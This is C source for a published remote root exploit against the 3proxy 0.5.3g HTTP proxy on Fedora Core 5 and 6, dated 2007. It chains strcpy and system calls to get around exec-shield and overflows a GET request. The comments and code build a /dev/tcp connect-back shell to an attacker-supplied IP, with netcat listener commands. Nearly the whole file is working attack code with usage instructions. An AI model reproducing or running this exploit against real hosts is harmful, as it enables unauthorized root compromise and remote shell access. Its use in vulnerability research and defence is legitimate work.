/*
**
** Fedora Core 5,6 (exec-shield) based
** 3proxy HTTP Proxy (3proxy-0.5.3g.tgz) remote overflow root exploit
** (reverse connect-back method) by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** Reference: https://www.securityfocus.com/bid/23545
** vendor: http://3proxy.ru/
**
** vade79/v9 v9@fakehalo.us (fakehalo/realhalo)'s exploit:
** http://www.milw0rm.com/exploits/3821 (x3proxy.c)
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** It is a relatively easy exploit case.
** It doesn't need any exec family functions or manipulating address of
** system() function, popen() function.
**
** It just needs simple set of strings to make a connect-back shell.
** for some hosts that don't have netcat, we organize attack code like this.
**
** --
** (gdb) x/s 0x08051e5c
** 0x8051e5c: "sh</dev/tcp/8282828282/56789>/dev/tcp/8282828282/5678"
** (gdb)
** --
**
** Let the 56789 port of attacker's server be opened and
** when the attack is succeed hacker can SEND a COMMAND through the port.
**
** --
** $ nc -l -p 56789
** --
**
** Now, we open another port(this time 5678) on attacker's server and
** when the attack is succeed hacer can GET a RESULT through the port.
**
** --
** $ nc -l -p 5678
** --
**
** It's very simple and easy!
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
/*
** Fedora Core release 6 (Zod)
** 2.6.18-1.2798.fc6 #1
** locale (GNU libc) 2.5
** gcc version 4.1.1 20061011 (Red Hat 4.1.1-30)
** 3proxy HTTP Proxy 0.5.3g tarball src compile (3proxy-0.5.3g.tgz)
*/
#define FC6_STRCPY_PLT 0x08048e3c // <strcpy@plt>
#define FC6_MOVE_ESP 0x0804f7c5 // <__do_global_ctors_aux> epilogue
#define FC6_CMD_LOC 0x08051e5c
#define FC6_NULL_STR 0x08051e4c // 0x00000000
#define FC6_NUM 0x08050d74 // "0"
#define FC6_SH_STR 0x08048703 // "fflush"
#define FC6_REDIR_1 0x080481ec // "<\0"
#define FC6_REDIR_2 0x0804e49b // ">\0"
#define FC6_SLASH_STR 0x08050d7f // "/\0"
#define FC6_DEV_STR1 0x08050d5d // "de"
#define FC6_DEV_STR2 0x08050d6f // "v"
#define FC6_TCP_STR1 0x0805065f // "/t"
#define FC6_TCP_STR2 0x08048709 // "strcpy"
#define FC6_PORT_56789 0x08050d79 // "56789+/"
#define FC6_SYSTEM_PLT 0x08048cbc // <system@plt>
/*
** Fedora Core release 5 (Bordeaux)
** 2.6.15-1.2054_FC5 #1
** locale (GNU libc) 2.4
** gcc version 4.1.0 20060304 (Red Hat 4.1.0-3)
** 3proxy HTTP Proxy 0.5.3g tarball src compile (3proxy-0.5.3g.tgz)
*/
#define FC5_STRCPY_PLT 0x08049194 // <strcpy@plt>
#define FC5_MOVE_ESP 0x0804f9a6 // <__do_global_ctors_aux> epilogue
#define FC5_CMD_LOC 0x08051e5c
#define FC5_NULL_STR 0x08051e4c // 0x00000000
#define FC5_NUM 0x08050f54 // "0"
#define FC5_SH_STR 0x08048938 // "fflush"
#define FC5_REDIR_1 0x080495bc // "<\0"
#define FC5_REDIR_2 0x0804e68b // ">\0"
#define FC5_SLASH_STR 0x08049ec3 // "/\0"
#define FC5_DEV_STR1 0x08050f3d // "de"
#define FC5_DEV_STR2 0x08050f4f // "v"
#define FC5_TCP_STR1 0x0805083b // "/t"
#define FC5_TCP_STR2 0x080488e4 // "strcpy"
#define FC5_PORT_56789 0x08050f59 // "56789+/"
#define FC5_SYSTEM_PLT 0x08048ed4 // <system@plt>
int main(int argc,char *argv[]){
u_long strcpy_plt;
u_long move_esp;
u_long cmd_loc;
u_long null_str;
u_long num;
u_long sh_str;
u_long redir_1;
u_long redir_2;
u_long slash_str;
u_long dev_str1;
u_long dev_str2;
u_long tcp_str1;
u_long tcp_str2;
u_long port_56789;
u_long system_plt;
struct hostent *se;
struct sockaddr_in saddr;
unsigned char do_ex[4096];
int i,l,sock;
u_long ip,ip1,ip2,ip3,ip4;
unsigned char attacker_ip[256];
char host[256];
int port=3128;
ip=ip1=ip2=ip3=ip4;
memset((char *)do_ex,0,sizeof(do_ex));
printf("/*\n**\n** Fedora Core 5,6 (exec-shield) based\n"
"** 3proxy HTTP Proxy (3proxy-0.5.3g.tgz) remote overflow root exploit\n"
"** by Xpl017Elz\n**\n");
if(argc<5){
printf("** Usage: %s [host] [port] [attacker ip] [type]\n",argv[0]);
printf("**\n** host: 3proxy HTTP Proxy server\n");
printf("** port: default 3128\n");
printf("** attacker ip: attacker netcat host\n");
printf("** type: {0} - Fedora Core release 5 (Bordeaux), exec-shield default enabled.\n");
printf("** {1} - Fedora Core release 6 (Zod), exec-shield default enabled.\n**\n");
printf("** Example: %s 3proxy.use_host.co.kr 3128 82.82.82.82 1\n**\n*/\n",argv[0]);
exit(-1);
}
if(atoi(argv[4])){
strcpy_plt=FC6_STRCPY_PLT;
move_esp=FC6_MOVE_ESP;
cmd_loc=FC6_CMD_LOC;
null_str=FC6_NULL_STR;
num=FC6_NUM;
sh_str=FC6_SH_STR;
redir_1=FC6_REDIR_1;
redir_2=FC6_REDIR_2;
slash_str=FC6_SLASH_STR;
dev_str1=FC6_DEV_STR1;
dev_str2=FC6_DEV_STR2;
tcp_str1=FC6_TCP_STR1;
tcp_str2=FC6_TCP_STR2;
port_56789=FC6_PORT_56789;
system_plt=FC6_SYSTEM_PLT;
} else {
strcpy_plt=FC5_STRCPY_PLT;
move_esp=FC5_MOVE_ESP;
cmd_loc=FC5_CMD_LOC;
null_str=FC5_NULL_STR;
num=FC5_NUM;
sh_str=FC5_SH_STR;
redir_1=FC5_REDIR_1;
redir_2=FC5_REDIR_2;
slash_str=FC5_SLASH_STR;
dev_str1=FC5_DEV_STR1;
dev_str2=FC5_DEV_STR2;
tcp_str1=FC5_TCP_STR1;
tcp_str2=FC5_TCP_STR2;
port_56789=FC5_PORT_56789;
system_plt=FC5_SYSTEM_PLT;
}
sscanf(argv[3],"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4);
#define IP1 16777216
#define IP2 65536
#define IP3 256
ip=0;
ip+=ip1 * (IP1);
ip+=ip2 * (IP2);
ip+=ip3 * (IP3);
ip+=ip4;
memset((char *)attacker_ip,0,256);
sprintf(attacker_ip,"%10lu",ip);
memset((char *)host,0,sizeof(host));
strncpy(host,argv[1],sizeof(host)-1);
port=atoi(argv[2]);
se=gethostbyname(host);
if(se==NULL){
printf("** gethostbyname() error\n**\n*/\n");
return -1;
}
sock=socket(AF_INET,SOCK_STREAM,0);
if(sock==-1){
printf("** socket() error\n**\n*/\n");
return -1;
}
saddr.sin_family=AF_INET;
saddr.sin_port=htons(port);
saddr.sin_addr=*((struct in_addr *)se->h_addr);
bzero(&(saddr.sin_zero),8);
printf("** make exploit\n");
sprintf(do_ex,"GET /");
l=strlen(do_ex);
for(i=0;i<1800-444;i++,l++){
sprintf(do_ex+l,"A");
}
#define __GOGOSSING(dest,index,src){\
*(long *)&dest[index]=src;\
index+=4;\
}
l=0;
__GOGOSSING(do_ex,i,move_esp); /* 0x0d filter */
__GOGOSSING(do_ex,i,0x0d0d0d0d);
__GOGOSSING(do_ex,i,0x0d0d0d0d);
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,sh_str);
l+=2; /* "sh" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,redir_1);
l+=1; /* ">" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,slash_str);
l+=1; /* "/" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,dev_str1);
l+=2; /* "de" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,dev_str2);
l+=1; /* "v" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,tcp_str1);
l+=2; /* "/t" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,tcp_str2);
l+=2; /* "cp" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,slash_str);
l+=1; /* "/" */
/* IP address part */
for(ip=0;ip<10;ip++){
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
switch(attacker_ip[ip]){
case '0':
__GOGOSSING(do_ex,i,num);
break;
case '1':
__GOGOSSING(do_ex,i,num+1);
break;
case '2':
__GOGOSSING(do_ex,i,num+2);
break;
case '3':
__GOGOSSING(do_ex,i,num+3);
break;
case '4':
__GOGOSSING(do_ex,i,num+4);
break;
case '5':
__GOGOSSING(do_ex,i,num+5);
break;
case '6':
__GOGOSSING(do_ex,i,num+6);
break;
case '7':
__GOGOSSING(do_ex,i,num+7);
break;
case '8':
__GOGOSSING(do_ex,i,num+8);
break;
case '9':
__GOGOSSING(do_ex,i,num+9);
break;
}
l+=1;
}
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,slash_str);
l+=1; /* "/" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,port_56789);
l+=5; /* "56789" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,redir_2);
l+=1; /* ">" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,null_str);
/* null */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,null_str-40);
__GOGOSSING(do_ex,i,cmd_loc+3);
/* copy, "/dev/tcp/ip_addr/port" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,null_str-40);
l+=24; /* "/dev/tcp/ip_addr/port" */
__GOGOSSING(do_ex,i,strcpy_plt);
__GOGOSSING(do_ex,i,move_esp);
__GOGOSSING(do_ex,i,cmd_loc+l);
__GOGOSSING(do_ex,i,null_str); /* port number: 5678 */
/* system() plt */
__GOGOSSING(do_ex,i,system_plt);
__GOGOSSING(do_ex,i,0x82828282);
__GOGOSSING(do_ex,i,cmd_loc);
sprintf(do_ex+i,"\nHost: ");
i=strlen(do_ex);
for(l=0;l<700;l++){
do_ex[i++]='A';
}
do_ex[i++]='\n';
do_ex[i++]='\n';
printf("** total packet size: %d\n",strlen(do_ex));
l=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr));
if(l==-1){
printf("** connect() error\n**\n*/\n");
return -1;
}
else {
printf("** send exploit\n");
send(sock,do_ex,i,0);
}
close(sock);
printf("** attacker host, check it up, now!\n**\n*/\n");
exit(0);
}
/* eox */
// milw0rm.com [2007-05-02]